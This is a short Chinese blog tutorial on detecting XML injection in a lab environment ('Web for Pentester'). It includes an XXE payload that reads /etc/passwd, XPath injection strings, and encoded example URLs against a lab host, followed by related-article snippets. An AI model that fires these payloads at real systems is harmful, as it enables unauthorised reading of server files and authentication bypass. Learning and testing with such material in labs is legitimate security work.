XML注入攻击

最新推荐文章于 2024-06-16 11:03:37 发布
最新推荐文章于 2024-06-16 11:03:37 发布
阅读量2.7k 收藏 1
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rulerer/article/details/80774827
版权

1)  检测方法

通过爬取的url,获取参数(get/post/cookie),并修改参数为

<%3Fxml version%3D"1.0"encoding%3D"UTF-8"%3F><!DOCTYPE UserInfo[<!ENTITY nameSYSTEM"file%3A%2f%2f%2fetc%2fpasswd">]><aa>%26name%3B<%2faa>

匹配对应返回特征

2)  测试向量

测试向量

返回特征

<%3Fxml version%3D"1.0" encoding%3D"UTF-8"%3F><!DOCTYPE UserInfo[<!ENTITY name SYSTEM "file%3A%2f%2f%2fetc%2fpasswd">]><aa>%26name%3B<%2faa>

 

/bin/bash

'or 1=1]/parent::*/child::node()%00

对比初始页面和返回页面,返回页面内容包含初始页面内容

“or 1=1]/parent::*/child::node()%00

对比初始页面和返回页面,返回页面内容包含初始页面内容

 

3)  示例

1.访问链接:http://192.168.7.121/xml/example1.php?xml=%3Ctest%3Ehacker%3C/test%3E

修改参数值hacker为

<%3Fxml version%3D"1.0"encoding%3D"UTF-8"%3F><!DOCTYPE UserInfo[<!ENTITY nameSYSTEM"file%3A%2f%2f%2fetc%2fpasswd">]><aa>%26name%3B<%2faa>

得到链接:

http://192.168.7.121/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20UserInfo%5B%3C%21ENTITY%20name%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Caa%3E%26name%3B%3C%2faa%3E

访问结果

2.访问链接:http://192.168.7.121/xml/example2.php?name=hacker

修改参数值hacker为

'or1=1]/parent::*/child::node()%00

得到链接:

http://192.168.7.121/xml/example2.php?name=%27or%201=1]/parent::*/child::node()%00

访问结果


靶站来自web for pentester
RuleZero
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
你所不知道的XML安全——XML攻击方法小结
01-09
转载: 你所不知道的XML安全——XML攻击方法小结. XML可扩展标记语言,被设计用来传输和存储数据,其形式多样。某些在XML中被设计出来的特性,比如 XML schemas(遵循XML Schemas 规范)和documents type definitions(DTDs)都是安全问题来源。纵然被公开的讨论了上十年,还是有一大批一大批的软件死在针对XML攻击上。
XML注入攻击总结
qq_32238611的博客
09-08 1万+
XML注入攻击总结普通的XML注入 普通的XML注入 原理 XML注入攻击和SQL注入攻击的原理一样,利用了XML解析机制的漏洞,如果系统对用户输入"<",">"没有做转义的处理,攻击者可以修改XML的数据格式,或者添加新的XML节点,就会导致解析XML异常,对流程产生影响。 如何注入攻击 如下XML是用于注册访问用户,其中用户名是由用户自己输入的。 <?xml version="1.0" encoding="UTF-8" ?> <user role="gues
XML外部实体注入--XXE漏洞
qq_62793621的博客
05-16 1660
XXE的原理及常见利用方式。
bWAPP XML/XPath Injection
angry_program的博客
03-04 1380
前言 XML注入 XXE -"xml external entity injection", 即 "xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 XPath注入 是指利用XPath 解析器...
bWAPP之xpath注入
good good study
03-22 4834
目录 一. XML/XPath Injection (Login Form) 1. 源码分析 2. 构造绕过 一. XML/XPath Injection (Login Form) bWAPP之xpath注入如下,这里让我们登录 用户名那输入一个单引号发现报出了xmli的解析错误,可知是利用了xml/xpath解析的用户登录信息。 这里我们先不着急登录,先看下源代码来学习下这个漏洞 1. 源码分析 关键代码如下: 1. 程序接收了前台传进来的用户名和密码,未做任何过滤 2. 接着加
【XXE技巧拓展】————3、XML实体注入漏洞攻与防
Fly_鹏程万里
12-24 1956
目录 XML基础 XML实体注入漏洞的几种姿势 防御XML实体注入漏洞 XML基础 XML是一种用于标记电子文件使其具有结构性的标记语言,用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 XML技术基础我在这里将不在详细解读,有兴趣的小伙伴可以通过...
2.XML实体注入漏洞攻与防
weixin_30684743的博客
08-09 217
XML实体注入基础 当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探内网端口、攻击内网网站等危害。 简单了解XML以后,我们知道要在XML中使用特殊字符,需要使用实体字符,也可以将一些可能多次会用到的短语(比如公司名称)设置为实体,然后就可以在内容中使用。 如下就声明了一个名为 name 值为 bmjoker的实体。 <!DOCTYPE UserDa...
Web服务的XML注入攻击
02-24
Web服务的XML注入攻击
XML_xml_
09-30
3. **XML攻击**:XML注入攻击是针对处理XML数据的应用程序的常见威胁。攻击者可能会利用不安全的XML解析器插入恶意的XML代码,导致数据泄露或系统崩溃。因此,必须使用安全的解析策略,如禁止外部实体引用,避免XXE...
XStream解析XML实例
04-14
XStream默认不开启安全性,这意味着恶意用户可能会通过XML注入攻击。为了避免这种情况,应始终启用`XStream的安全模式`: ```java xstream.processAnnotations(Person.class); // 需要注解支持 xstream....
XMLView.zip
07-05
因此,防止XML注入攻击,如XXE(XML External Entity)和XSS(Cross-Site Scripting),是开发过程中的重要环节。开发人员需要确保正确验证和编码输入,限制XML解析器的配置,以减少潜在的安全风险。 XMLView这样的...
你所不知道的XML安全—XML攻击方法小结
01-30
XML可扩展标记语言,被设计用来传输和存储数据,其形式多样。某些在XML中被设计出来的特性,比如 XMLschemas(遵循XMLSchemas规范)和documentstypedefinitions(DTDs)都是安全问题来源。纵然被公开的讨论了上十年,还是有一大批一大批的软件死在针对XML攻击上。XML可扩展标记语言,被设计用来传输和存储数据。其形式多样例如:1.文档格式(OOXML,ODF,PDF,RSS,DOCX...)2.图片格式(SVG,EXIFHeaders,...)3.配置文件(自定义名字,一般是.xml)4
Having Fun with XML Hacking
04-13
然而,如同任何其他编程或数据交换技术,XML也存在安全风险,其中之一就是XML注入攻击XML注入攻击是当恶意用户通过输入恶意构造的XML数据来操纵应用程序的解析逻辑时发生的。这种攻击方式可能导致数据泄露、系统...
PHP安全:XML注入漏洞防护
yihuliunian的博客
09-09 1426
XML注入攻击也称为XXE(XML External Entity attack)漏洞,XML文件的解析依赖于libxml库,libxml 2.9及以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的XML文件时未对XML文件引用的外部实体(含外部普通实体和外部参数实体)进行合适的处理,并且实体的URL支持file://和php://等协议,攻击者可以在XML文件中声明URI指向服务器本地的实体造成攻击。 XXE漏洞一旦被攻击者利用,可以读取服务器任意文件、执行任意代码、发起DDos攻击。 在
Web安全之XML注入
热门推荐
brizer的博客
09-06 1万+
XML注入攻击,和SQL注入的原理一样,都是攻击者输入恶意的代码来执行自身权限以外的功能。 XML是存储数据的一种方式,如果在修改或者查询时,没有做转义,直接输入或输出数据,都将导致XML注入漏洞。攻击者可以修改XML数据格式,增加新的XML节点,对数据处理流程产生影响。攻击下面是一个保存注册用户信息为XML格式的例子:final String GUESTROLE = "guest_role";
web安全渗透测试十大常规项(一):web渗透测试XML和XXE外部实体注入
最新发布
HACKONE的博客
06-16 289
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网扫描、攻击内网等危害。1、获取Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试
XML注入学习
xujunhui222的博客
02-10 6667
一、什么是XML注入 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准 简单来说xml就是用来存储数据的。 二、XML的特点 XML仅仅是纯文本,他不会做任何事情。 XML可以自己发明标签(允许定义自己的标签和文档结构) 三、XML的定义 首先是XML声明,然后是DTD
基于XML注入
欢迎阅读我的博客
03-18 392
准备一个UserDao类和UserService类 , 其中 UserService类中有UserDao类型的属性 注入外部Bean(常用) 注入外部Bean的方式:在外部注册一个bean, 然后通过外部bean的id配合property标签的ref引用属性进行注入 注入内部Bean(了解) 注入内部Bean的方式:在bean标签中嵌套bean标签 , 内部bean的id是没有用的 , 不能通过容器被获取到所以不用写id set 注入的核心实现原理 set注入是基于set方法实现的,底层会通过反射机制调用属
XML之XXE漏洞 XML外部实体注入攻击
qq_60115503的博客
05-24 1246
XXE:XML External Entity即外部实体,从安全角度理解成XML External attack外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者通过ENTITY伪造外部实体构成,比如PHP中simplexml_load默认情况下会解析外部实体,XXE标志性函数simplexml_load_string()
CRLF注入攻击代码例子
03-05
抱歉,我可以回答这个问题。CRLF注入攻击是一种利用Web应用程序中的CRLF(回车换行)字符漏洞,向HTTP响应头中注入恶意代码的攻击方式。以下是一个CRLF注入攻击的代码例子: GET /index.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5. (Windows NT 10.; Win64; x64; rv:58.) Gecko/20100101 Firefox/58. Accept: text/html,application/xhtml+xml,application/xml;q=.9,*/*;q=.8 Referer: http://example.com/index.php?page=1 Cookie: PHPSESSID=123456789abcdef Connection: close 攻击者可以在Referer字段中注入CRLF字符,从而在HTTP响应头中插入任意的恶意代码。这种攻击方式可以导致跨站脚本攻击(XSS)和跨站请求伪造(CSRF)等安全问题。因此,Web应用程序开发者应该注意防范CRLF注入攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值